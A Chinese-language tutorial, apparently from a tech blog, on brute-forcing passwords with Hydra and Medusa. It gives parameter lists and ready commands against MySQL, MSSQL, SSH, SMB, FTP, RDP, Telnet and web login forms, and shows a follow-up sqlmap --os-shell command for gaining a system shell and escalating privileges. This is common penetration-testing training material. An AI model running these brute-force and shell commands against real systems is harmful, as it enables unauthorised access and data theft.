每日一句：竹批双耳峻，风入四蹄轻。          ——杜甫《房兵曹胡马诗》本文内容：hydra简介hydra安装配置hydra破解美杜莎- Medusa目标：使用hydra暴力破解密码

一、hydra简介

1，定义 Hydra对应的英文意思是九头蛇，它是一款爆破神器，可以对多种服务的账号和密码进行爆破，包括Web登录、数据库、SSH、FTP等服务，支持Linux、Windows、Mac平台安装，其中Kali Linux中自带Hydra。hydra支持的服务有：POP3，SMB，RDP，SSH，FTP，POP3，Telnet，MYSQL……最大的安全漏洞之一是弱口令。        hydra都可以很有针对性的攻击

二、hydra安装配置

     1，Kali是安全从业人员常用的Linux系统，自带有大量安全工具集，Hydra自然也集成在里面，工具位置在密码攻击—在线攻击一栏。2，开源项目：https://github.com/vanhauser-thc/thc-hydra3，Windows中Hydra安装Hydra官方不支持Windows版，需要在GitHub上下载，地址为：https://github.com/maaaaz/thc-hydra-windows   下载之后解压缩即可。

三、hydra破解

 1，Hydra相关参数-l LOGIN 指定破解的用户名称，对特定用户破解。-L FILE 从文件中加载用户名进行破解。-p PASS小写p指定密码破解，少用，一般是采用密码字典。-P FILE 大写字母P，指定密码字典。-e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。-C FILE 使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。-t TASKS 同时运行的连接的线程数，每一台主机默认为16。-M FILE 指定服务器目标列表文件一行一条-w TIME 设置最大超时的时间，单位秒，默认是30s。-o FILE 指定结果输出文件。-f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。-v / -V 显示详细过程。-R 继续从上一次进度接着破解。-S 采用SSL链接。-s PORT 可通过这个参数指定非默认端口。-U       服务模块使用细节-h       更多的命令行选项（完整的帮助）server    目标服务器名称或者IP（使用这个或-M选项）service 指定服务名，支持的服务和协议：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等OPT       一些服务模块支持额外的输入（-U用于模块的帮助）2，Hydra用法案例~打开方式：~图形化界面：xhydra~命令行打开：hydra推荐用命令行直接搞~破解MySQL密码扩展：数据库一般会提供一个默认的帐户，SQL Server的sa用户，MySQL的root用户，Oracle的System用户等。场景：假如我们现在破解mysql数据库步骤：~hadry -L user.txt -P pass.txt ip mysql~hydra -L user.txt -P pass.txt mysql://目标IP:mysql端口号场景：如果需要将爆破的过程打印出来就加个指令-v实例：hydra -L username.txt -P password.txt -v mysql://目标IP:mysql端口号说明：      成功后会打印类似如下的信息：       [1433][mssql] host:ip  login:sa  password:sqladmin问：得到mysql的密码后一般都干什么？~脱库~提权如果破解数据库的密码为sqladmin，可以利用sqlmap进一步来反弹一个与系统交互的Shell用来提权。命令为：sqlmap.py -d "mssql://sa:sqladmin@ip:1433/master" --os-shell~破解sshhydra -l 用户名 -P 密码字典 -t 线程 -vV -e ns ip sshhydra -l 用户名 -P 密码字典 -t 线程 -o save.log -vV ip ssh命令详细：攻击目标：192.168.1.113使用的模块：ssh爆破用户名：root(-l)使用的密码字典：/root/passwd.txt (-P)爆破线程数：6 (-t)显示详细信息 (-V)爆破成功一个后停止 (-f)~windows密码破解hydra -l 用户名 -p 密码 smb://ip -vV<br>或者<br>hydra -l 用户名 -p 密码 smb ip –vV~破解ftphydra ip ftp -l 用户名 -P 密码字典 -t 线程数(默认16) –vV如果你发现目标ftp并不是在21端口，而是在其他端口上，可以使用-s参数指定正确的端口，其他服务同样如此。~破解rdphydra ip rdp -l administrator -P pass.txt –V===若是不可以用，记得更新一下hydra~破解telnethydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f –V~破解httpshydra -m /index.php -l muts -P pass.txt ip https~get方式提交 破解web登录hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /web/~post方式提交 破解web登录hydra -l 用户名 -P 密码字典  ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" -V 注意：但是表单爆破推荐burp，hydra太过鸡肋

四、美杜莎- Medusa

     hydra的缺点-稳定性差，程序时常崩溃-速度控制不好，容易触发服务器屏蔽或锁死机制-每主机新建进程，没服务新建实例-大量目标破解时性能差medusa的特点-稳定性好-速度控制得当-基于线程-支持模块少于hydra(不支持rdp 远程桌面)-WEB-Form支持存在缺陷参数：-h [TEXT]      目标IP           注意！！！不是帮助-H [FILE]      目标主机文件-u [TEXT]      用户名-U [FILE]      用户名文件-p [TEXT]      密码-P [FILE]      密码文件-C [FILE]      组合条目文件-O [FILE]      文件日志信息-e [n/s/ns]    N意为空密码，S意为密码与用户名相同-M [TEXT]      模块执行名称-m [TEXT]      传递参数到模块-d             显示所有的模块名称-n [NUM]       使用非默认端口-s             启用SSL-r [NUM]       重试间隔时间，默认为3秒-t [NUM]       设定线程数量-L             并行化，每个用户使用一个线程-f             在任何主机上找到第一个账号/密码后，停止破解-q             显示模块的使用信息-v [NUM]       详细级别（0-6）-w [NUM]       错误调试级别（0-10）-V             显示版本-Z [TEXT]      继续扫描上一次使用语法：Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]破解MSSQLmedusa -h ip -u sa -P /pass.txt -t 5 -f -M mssql破解SSHmedusa -M ssh -H host.txt -U user.txt -p password输出为日志文件，使用-O参数medusa -h ip -u sa -P /pass.txt -t 5 -f -e ns -M mssql -O /ap.txt

说明： hydra与medusakali均自带

第四章-2 hydra(九头蛇)与Medusa(美杜莎)相关推荐

1. hydra九头蛇基本使用方法

   hydra九头蛇基本使用 1.破解ssh: hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -p 密码字典 -t 线程 -o save ...

2. hydra海德拉 and Medusa美杜莎简单使用教程

   hydra海德拉使用 hydra -L /home/chenglee/zidian/user.txt -P /home/chenglee/zidian/wordlist.TXT 192.168.137 ...

3. 大数据 addthis hydra 九头蛇的学习 第一章

   Hydra (九头蛇简介) Hydra(九头蛇),分布式任务处理系统,由社交标签服务提供商AddThis六年前开发,现在已得到Apache的开源许可,就像Hadoop一样,只是还没有Hadoop那样的 ...

4. Medusa(美杜莎)和Hydra(九头蛇)快速入门手册：01

   今天主要是初步介绍一些Hydra和Medusa的分析和内容,旨在方便快速入门,这是第一部分Medusa,后面附带一些字典,之所以是写一起,我是觉得这两个都是不错的工具,不应该分开的,在这种思想下就汇总 ...

5. Medusa(美杜莎)和Hydra(九头蛇)快速入门手册：02

   本文是Medusa和Hydra快速入门手册的第二部分,第一部分的传送门这两篇也是后续爆破篇的一部分,至于字典,放在最后,后续会把祖传的几十G字典准备好 Hydra入门使用手册 vanHauser Th ...

6. hydra九头蛇详细教程（5分钟内快速学会）

   hydra详细教程(本文的目的是使小白能一眼看懂,在5分钟之内能够直接使用hydra,在实验中更好的学习,进行大多数的破解) hydra工具介绍 hydra又名九头蛇,是一款爆破神器. 支持linux ...

7. Hydra(九头蛇)工具使用

   Hydra工具使用 1.Hydra简介 1.1.Hydra介绍 1.2.Hydra支持协议 1.3.Hydra下载 2.Hydra使用 2.1.Hydra基本使用方式 2.2.Hydra常用参数 2. ...

8. Hydra(九头蛇)弱口令

   使用总结: 参数 -l 指定单个用户名,适合在知道用户名爆破用户名密码时使用 -L 指定多个用户名,参数值为存储用户名的文件的路径(建议为绝对路径) -p 指定单个密码,适合在知道密码爆破用户名时使用 ...

9. hydra 九头蛇端口爆破

   指令介绍 root@xaiSec:~# hydra -help Hydra v7.4.2(c)2012 by van Hauser / THC&David Maciejak - 仅供法律用途语 ...

10. 【渗透测试】密码暴力破解工具——九头蛇（hydra）使用详解及实战

    目录 九头蛇hydra 使用方法 案例分析 暴破ssh登录密码 环境介绍 开始爆破 破解成功 测试登录 各种协议破解汇总 FTP协议破解 http协议破解 https协议破解 路由器破解 http-p ...

最新文章

1. jar包冲突与inode
2. week7 read
3. Ubuntu 16上命令行提示长目录的解决办法
4. 神奇宝贝HTML游戏代码,《我的世界》神奇宝贝召唤神兽指令 各神兽召唤代码大全...
5. Excel技巧—超实用的字符串拆分小技巧
6. 平均股价的时间序列图形_统计学-时间序列分析ppt
7. 产业“上链”至深处，京东云如何作为？
8. 300字美文摘抄加赏析
9. 新版Android Studio Logcat view使用简明教程
10. OpenAtom XuperChain开发者夏季论坛落幕，多位行业大咖共话开源区块链前景
11. 关于js 中 try catch用法
12. 欧盟CE公告号-外贸人不得不了解的通关证书
13. 病毒木马查杀实战第026篇：“白加黑”恶意程序研究（上）
14. VSFTPD + NGINX
15. DeepLog: Anomaly Detection and Diagnosis from System Logs through Deep Learning
16. 你知道吗？没有硅胶消泡剂，避孕套可能都不安全了
17. 怎么使用php提交百度收录_百度站长平台链接自动提交PHP推送实现方式
18. 安全技术1 网络安全基础
19. 简智音科技：提高短视频播放量的实用方法！
20. [算法]二维数组前缀和

热门文章

1. 中文汉字错别字纠错方法
2. 51单片机定时器时间计算
3. 证券交易系统 -- 为什么要低延迟？
4. 我没见过凌晨四点的洛杉矶，但想带你聆听每个都市夜归人的故事
5. 小众软件android,七款优秀的小众软件，每款都是装逼神器！
6. 一封谷歌账号辅助邮箱变更的广告邮件
7. js基础——图片切换实例(函数传参)
8. 乡镇特色产业发展情况调研报告
9. cewl工具（URL字典生成器）
10. 04 - SSH攻击Linux服务器（简单）